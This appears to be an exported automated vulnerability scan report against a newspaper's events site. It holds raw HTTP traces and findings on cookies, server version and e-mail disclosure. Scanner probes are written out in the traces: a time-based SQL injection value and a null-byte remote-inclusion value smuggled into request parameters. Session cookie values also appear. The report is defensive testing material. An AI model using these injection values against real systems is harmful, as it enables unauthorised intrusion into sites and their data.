type="text/javascript" src="/javascripts/s_code.js"></script><script language="JavaScript" type="text/javascript"><!--s_zv.prop48="art_DET"s_zv.prop49="art_ZEN"s_zv.pageType="errorPageSysError" s_zv.pageName="System Error" s_zv.channel="" s_zv.hier1="" s_zv.prop12="" s_zv.prop25="/search?has_editors_pick=1&new=n&srad=40&swhat=3&swhen=http://netsparker.com/n?%00.php" s_zv.prop29="events.detnews.com" s_zv.prop30="Detroit News" s_zv.prop31="Detroit Media Partnership" s_zv.prop32="26" s_zv.prop28="Detroit Media Partnership:Detroit News:events.detnews.com:26" s_zv.prop41="not logged in" s_zv.prop42="Detroit News|System Error" s_zv.server="www21.admin.zvents.com:classic" s_zv.linkInternalFilters="javascript:,events.detnews.com" /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_zv.t();if(s_code)document.write(s_code)//--></script><script language="JavaScript" type="text/javascript"><!-- if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-') //--></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://metrics.zvents.com/b/ss/zv_prod/1/H.20.3--NS/0" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/--><!-- End SiteCatalyst code version: H.20.3. --><script language="JavaScript" type="text/javascript"> (function($){ $(function(){ $('.sc-event-buytixbig').click(function(){ s_zv.tl(this, 'o', 'EventDetail_BuyTix_GreenButton'); return true; }); $('.sc-event-buytixico').click(function(){ s_zv.tl(this, 'o', 'EventDetail_Recurring_BuyNowIco'); return true; }); $('.sc-venue-reservation').click(function(){ s_zv.tl(this, 'o', 'MakeReservation_GreenButton'); return true; }); $('.sc-serp-reservation').click(function(){ s_zv.tl(this, 'o', 'SERP_HotDining_BuyNow'); return true; }); $('.sc-reminder').click(function(){ this.name = "lid=Reminder_icon&lpos="+s_zv.pageName; s_zv.tl(this, 'o', 'Reminder_icon'); return true; }); }); })($ZJQuery);</script><div id="wrapper"><link href="http://detroitnews.com/includes/css/ody/ody-vendor.min.css" rel="stylesheet" type="text/css">
<link href="http://detroitnews.com/includes/css/ody/ody-local.css" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="http://detroitnews.com/odygci/p4/ody-styles-min.css"/>
<!-- Load jQuery from Google CDN with local fallback -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
<script>window.jQuery || document.write('<script src="js/libs/jquery-1.6.2.min.js"><\/script>')</script>
<!-- Load jQueryUI from Google CDN -->
<script src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.js"></script>
<script src="http://detroitnews.com/includes/js/detnews-1.0.js"></script>
<script src="http://detroitnews.com/odygel/lib/core/core.js"></script>
!-- Start OAS Ad Code -->
<script type="text/javascript" language="JavaScript">
listpos_IN = "728x90_1,728x90_2,Flex_1,Flex_2,300x250_1,300x250_2,160x600_1,88x31_1,PageCount";
sitepage_IN = " mi-zvents.detnews/events/detail";
</script>
<script type="text/javascript" src="http://www.detnews.com/portables/OAS_functions.js"></script>
<!-- End OAS Ad Code -->
<script type="text/javascript">
var omitHeaderLeaderboardAd_IN = "false";
var omitMicroBarAd_IN = "true";
var omitFooterLeaderboardAd_IN = "false";
var configureHeaderClass_IN = "inside";
var configureFrontHeader_IN = "true";
var configureInsideHeader_IN = "false";
var configureSectionName_IN = "Events Calendar";
var configureSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
var configureChildSectionName_IN = "";
var configureChildSectionLink_IN = "\'http:\/\/apps.detnews.com\/apps\/multimedia\/index.php'";
</script>
</head>
<body class="ody-skin">
<div class="ody-custom interactive">
<div class="ody-custom-wrapper">
<script type="text/javascript" src="http://detroitnews.com/portables/header.js"></script>
<div class="ody-wrapper grid_18">
<div class="content-container">
<div class="container">
<div class="ody-article article">
<div class="interactive"><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery("#swhat").hint('blur',false); $ZJQuery("#swhen").hint('blur',false); $ZJQuery("#main_neighborhood_link").zModal({load: "/welcome/populate_neighborhoods/", showCloseIcon: true, remote: true, modalHeight: 400}); $ZJQuery(".nav_bar_tab").divlink(); });</script><div id='z_search_and_browse'><div id='z_search_bar'><form action="/search" method="get"><div class="search-control"><label>what</label> <input id="swhat" name="swhat" type="text" value="3" /></div><div class="search-control"><label>when</label> <input id="swhen" name="swhen" type="text" value="http://netsparker.com/n? .php" /></div><div class="search-control"><label>near</label> <input id="swhere" name="swhere" type="text" value="Royal Oak Charter Township, MI" /><br /><span id="near_help">Address, <a href="javascript:void(0)" id="main_neighborhood_link" class="neighborhood_link">Neighborhood</a>, City & State, or ZIP</span></div><div class="search-control"><input id="z_search_button" name="commit" type="submit" value="Search" /><select id="st_select" name="st_select"><option value="any" selected="selected">All Listings</option><option value="event">Events</option><option value="movie">Movies</option><option value="venue">Venues</option><option value="restaurant">Restaurants</option></select></div><input type="hidden" name="search" value="true" /><input type="hidden" name="svt" value="text" /><input type="hidden" name="srss" value="50" /><div class="divclear"></div></form></div><div class="nav_bar"><div class="nav_bar_link"><a href="/welcome/create"><img alt="Ico_add" src="http://js.zvents.com/images/ico_add.gif?version=0.606147970006598" /> add to our listings</a></div><div class='nav_bar_tab nav_bar_on'><a href="/48067/events" name="&lid=Header_NavBar_&lpos=_">events</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/movies" name="&lid=Header_NavBar_&lpos=_">movies</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/venues" name="&lid=Header_NavBar_&lpos=_">venues</a></div><div class='nav_bar_tab nav_bar_off'><a href="/48067/restaurants" name="&lid=Header_NavBar_&lpos=_">restaurants</a></div><div class="divclear"></div></div></div><div class="login_tools z_login_tools"><a href="/">Home</a> |<a href="/user/signup?return_to=%2Fsearch%3Fhas_editors_pick%3D1%26new%3Dn%26srad%3D40%26swhat%3D3%26swhen%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%2500.php">Register</a> | <a href="/user/login?return_to=%2Fsearch%3Fhas_editors_pick%3D1%26new%3Dn%26srad%3D40%26swhat%3D3%26swhen%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%2500.php">Log In</a></div><div id="content"><div style="width:550px;margin:0 auto;"><h2>You have encountered an error.</h2><p> We apologize for the inconvenience. Details of this issue have been emailed to technical support.</p><p> If you need immediate assistance or would like to contact technical support directly, please <a href="/support/contact">contact us here</a>.</p></div><div class="divclear"></div></div><div class="divclear"></div></div>
</div><!-- Closing .article -->
</div><!-- Closing .container -->
</div><!-- Closing .content-container -->
</div><!-- Closing .ody-wrapper -->
<!--<script type="text/javascript" src="http://detroitnews.com/portables/insidetdn.js"></script>-->
<script type="text/javascript" src="http://detroitnews.com/portables/footer.js"></script>
</div><!-- Closing .ody-custom-wrapper -->
</div><!-- Closing .ody-custom -->
<!--
<script type="text/javascript" language="JavaScript">
s.pageName="events.detnews.com|Zvents|" + TDN_pageType + "|" + z_temp_type + "|" + document.title;
s.server=""; // Do Not Alter
s.channel="";
s.pageType="";
s.pageValue="";
s.prop1 = "Entertainment";
s.prop2 = "Entertainment_Events";
s.prop3 = "";
s.prop4 = "";
s.prop5 = "";
s.prop6 = "entertainment_tourism";
s.prop7 = "entertainment";
s.prop16 = "";
s.prop25="Detroit:detnews";
s.prop50="Newspaper";
</script>
<script type="text/javascript" src="http://detroitnews.com/portables/site_catalyst.js"></script> --> <div id="zpwrdby"> <a href="http://www.zvents.com/z48067"><img src="/images/zPB.gif" alt="Zvents - Discover things to do" border="0" /></a> </div></div><script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script><script type="text/javascript">_uacct = "UA-31999-22";urchinTracker();</script><!-- Start Quantcast tag --><script type="text/javascript">_qoptions={qacct:"p-54UqpxMM201CU"};</script><script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script><noscript><img src="http://pixel.quantserve.com/pixel/p-54UqpxMM201CU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></noscript><!-- End Quantcast tag --><img src="http://ads.bluelithium.com/pixel?id=883607&t=2" width="1" height="1" /><script type="text/javascript" charset="utf-8"> $ZJQuery(document).ready(function(){ $ZJQuery(document).append('<div style="display:none"><img width="1px" height="1px" src="http://js2.zvents.com/images/js2_test.gif" /></div>'); });</script></body></html>
Cookie Not Marked As HttpOnly
Cookie Not Marked As HttpOnly
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..
Impact
During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.
Actions to Take
- See the remedy for solution
- Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.
Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as
XSS Tunnel to bypass HTTPOnly protection.
External References
Classification
Parameters
Parameter
|
Type
|
Value
|
return_to
|
GET
|
1;WAITFOR DELAY '0:0:25'--
|
welcome
Request
GET /user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:46 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 302 Found
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 174.36.218.2
Location: https://secure.zvents.com/elx/events_detnews_com/user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27--&elxt=83fa1cfea3e7eb599804716f580e67bb::8a93353a68bbd62e394044e2ccec2e0a
X-Runtime: 11
Z-DETECTED-FLAVOR: events_flavor |
Cache-Control: no-cache
Z-REQUEST-HANDLED-BY: www17
Set-Cookie: welcome=jBhyRcrOZRAYx83quTJTsw.130338087; path=/; expires=Tue, 14-Jan-2042 13:51:45 GMT,zvents_tracker_sid=jBhyRcrOZRAYx83quTJTsw.130338087; path=/; expires=Tue, 14-Jan-2042 13:51:45 GMT,_zsess=BAh7BzoPc2Vzc2lvbl9pZCIlZjlmZjI2ODg0NjAyYmVmOGJmNjY4ODU2ZmQ1OGU4ZDIiDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--fc8019d92289bab22905e41db8a269fe20b6e5fd; path=/; expires=Sat, 14-Apr-2012 13:51:46 GMT; HttpOnly
<html><body>You are being <a href="https://secure.zvents.com/elx/events_detnews_com/user/login?return_to=1;WAITFOR%20DELAY%20%270:0:25%27--&elxt=83fa1cfea3e7eb599804716f580e67bb::8a93353a68bbd62e394044e2ccec2e0a">redirected</a>.</body></html>
Nginx Server Version Disclosure
Nginx Server Version Disclosure
Netsparker identified that the target web server is Nginx. This information was gathered from the HTTP Headers.
Impact
An attacker can look for specific security vulnerabilities for the version disclosed by the SERVER
header.
Add the following line to your nginx.conf file to prevent information leakage from the
SERVER
header of its HTTP response.
server_tokens off
Classification
0.6.39
Request
GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiC3JhZGl1c2ktIgljaXR5Igo0ODA2NyIKZXJyb3JGIg1sYXRpdHVkZWYPNDIuNDkyMwDpECINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciCjQ4MDY3IhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--b2c99bac14f9b2252a0baa7f0d06fedecd1c46c7; welcome=otveTBzyklL56DQ2nUmY6Q.130338078; zvents_tracker_sid=otveTBzyklL56DQ2nUmY6Q.130338078
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:36 GMT
Content-Type: text/xml
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 19
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="sitemap.xml"
Cache-Control: private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--9cdee8562d12d756b8b96787d6f41e0a85d341c4; path=/; expires=Sat, 14-Apr-2012 13:51:36 GMT; HttpOnly
Content-Encoding:
<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>http://events.detnews.com/sitemapevent26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapvenue26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapkeyword26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapcategory26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaprestaurant26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaptheater26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapmovie26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap></sitemapindex>
E-mail Address Disclosure
E-mail Address Disclosure
Netsparker found e-mail addresses on the web site.
Impact
E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .
Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.
External References
Classification
- /opensearch/description26.xml
|
support@zvents.com
Request
GET /opensearch/description26.xml HTTP/1.1
Referer: http://events.detnews.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--9cdee8562d12d756b8b96787d6f41e0a85d341c4; welcome=otveTBzyklL56DQ2nUmY6Q.130338078; zvents_tracker_sid=otveTBzyklL56DQ2nUmY6Q.130338078
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:37 GMT
Content-Type: text/xml
Last-Modified: Sat, 14 Jan 2012 08:07:19 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sun, 15 Jan 2012 13:51:37 GMT
Cache-Control: max-age=86400
Content-Encoding:
<?xml version="1.0" encoding="UTF-8"?><OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/"><ShortName>Zvents: Discover Things To Do</ShortName><Description>Use to discover things to do.</Description><Tags>local events venues restaurants movies performers</Tags><Contact>support@zvents.com</Contact><Url type="application/rss+xml" xmlns:zvents="http://events.detnews.com/opensearchextensions/1.0/" template="http://events.detnews.com/search?swhat={searchTerms}&swhen={zvents:when?}&swhere={zvents:where?}&srad={radius?}&ssi={startIndex?}&srss={itemsPerPage?}&format=opensearch" /><Url type="text/html" xmlns:zvents="http://events.detnews.com/opensearchextensions/1.0/" template="http://events.detnews.com/search?swhat={searchTerms}&ssi={startIndex?}&srss={itemsPerPage?}" /><LongName>: Discover Things To Do</LongName><Image type="image/gif">http://events.detnews.com/images/zvents_opensearch.gif</Image><Query role="example" searchTerms="dance" /><Attribution> Event search data &copy; 2006, Zvents.com, Inc., All Rights Reserved</Attribution></OpenSearchDescription>
Sitemap Identified
Sitemap Identified
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.
Impact
This issue is reported as extra information, there is no direct impact resulting from this.
Request
GET /sitemap.xml HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: events.detnews.com
Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiC3JhZGl1c2ktIgljaXR5Igo0ODA2NyIKZXJyb3JGIg1sYXRpdHVkZWYPNDIuNDkyMwDpECINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCITZGlzcGxheV9zdHJpbmciCjQ4MDY3IhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--b2c99bac14f9b2252a0baa7f0d06fedecd1c46c7; welcome=otveTBzyklL56DQ2nUmY6Q.130338078; zvents_tracker_sid=otveTBzyklL56DQ2nUmY6Q.130338078
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 14 Jan 2012 13:51:36 GMT
Content-Type: text/xml
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss
X-Runtime: 19
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename="sitemap.xml"
Cache-Control: private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNWU3OTlhMzNiMGNmYWQ0MTJhNjhiZTVkN2I2Njg2OTciDWxvY2F0aW9uexAiCWNpdHkiCjQ4MDY3IgtyYWRpdXNpLSINbGF0aXR1ZGVmDzQyLjQ5MjMA6RAiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIgo0ODA2NyINdGltZXpvbmUiFEFtZXJpY2EvRGV0cm9pdCIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhAtODMuMTMyNwALeCIRd2hlcmVfc3RyaW5nQBIiCnN0YXRlMA%3D%3D--9cdee8562d12d756b8b96787d6f41e0a85d341c4; path=/; expires=Sat, 14-Apr-2012 13:51:36 GMT; HttpOnly
Content-Encoding:
<?xml version="1.0" encoding="UTF-8"?><sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>http://events.detnews.com/sitemapevent26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapvenue26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapkeyword26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapcategory26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaprestaurant26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemaptheater26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap> <sitemap> <loc>http://events.detnews.com/sitemapmovie26m0n0.xml</loc> <lastmod>2012-01-14T00:05:20+08:00</lastmod> </sitemap></sitemapindex>